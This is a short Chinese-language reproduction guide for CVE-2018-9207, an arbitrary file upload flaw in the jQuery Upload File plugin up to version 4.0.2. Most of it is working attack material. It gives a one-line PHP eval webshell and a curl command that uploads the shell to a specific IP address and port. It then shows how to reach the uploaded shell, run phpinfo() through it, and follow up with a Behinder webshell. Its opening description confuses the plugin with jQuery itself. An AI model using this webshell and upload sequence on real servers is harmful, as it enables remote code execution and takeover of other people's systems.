jquery 文件上传漏洞(CVE-2018-9207)
漏洞描述
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
影响范围
jQuery Upload File <= 4.0.2 中的任意文件上传
漏洞复现
准备好一句话木马 shell.php
<?php @eval($_POST['shell']) ?>
执行以下命令
curl -F "myfile=@shell.php" "http://123.58.224.8:52388/jquery-upload-file/php/upload.php"
访问以下目录
http://123.58.224.8:52388/jquery-upload-file/php/uploads/shell.php
使用POST传递参数shell,执行phpinfo();
shell=phpinfo();
上传冰蝎PHP马并使用客户端进行连接